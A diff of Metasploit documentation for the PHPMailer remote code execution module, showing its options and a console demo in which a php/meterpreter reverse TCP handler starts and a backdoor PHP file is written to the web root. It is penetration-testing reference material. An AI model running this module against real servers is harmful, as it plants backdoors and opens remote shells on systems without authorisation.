@@ -23,20 +23,21 @@ exploitation can take a few minutes.
2323 Demo taken directly from [ PR7768] ( https://github.com/rapid7/metasploit-framework/pull/7768 )
2424
2525```
26- msf (S:0 J:0) exploit(php_mailer) > options
26+ msf (S:0 J:0) exploit(php_mailer) > options
2727
2828Module options (exploit/linux/http/php_mailer):
2929
30- Name Current Setting Required Description
31- ---- --------------- -------- -----------
32- Proxies no A proxy chain of format type:host:port[,type:host:port][...]
33- RHOST 192.168.90.134 yes The target address
34- RPORT 8080 yes The target port
35- SSL false no Negotiate SSL/TLS for outgoing connections
36- TARGETURI / yes Path to the application root
37- VERSION <=5.2.18 yes The version of PHPMailer (Accepted: <=5.2.18, 5.2.20)
38- VHOST no HTTP server virtual host
39- WEB_ROOT /www yes Path to the web root
30+ Name Current Setting Required Description
31+ ---- --------------- -------- -----------
32+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
33+ RHOST 192.168.90.134 yes The target address
34+ RPORT 8080 yes The target port
35+ SSL false no Negotiate SSL/TLS for outgoing connections
36+ TARGETURI / yes Path to the application root
37+ TRIGGERURI no Path to the uploaded payload
38+ VHOST no HTTP server virtual host
39+ WEB_ROOT /www yes Path to the web root
40+
4041
4142
4243Payload options (php/meterpreter/reverse_tcp):
@@ -58,7 +59,7 @@ Exploit target:
5859msf (S:0 J:0) exploit(php_mailer) > rexploit
5960[*] Reloading module...
6061
61- [*] [2016.12.29-17:03:47] Started reverse TCP handler on 192.168.90.134:4444
62+ [*] [2016.12.29-17:03:47] Started reverse TCP handler on 192.168.90.134:4444
6263[*] [2016.12.29-17:03:47] Writing the backdoor to /www/0IxI5AFB.php
6364[*] [2016.12.29-17:04:07] Sleeping before requesting the written file
6465[*] [2016.12.29-17:04:07] Waiting for up to 300 seconds to trigger the payload
0 commit comments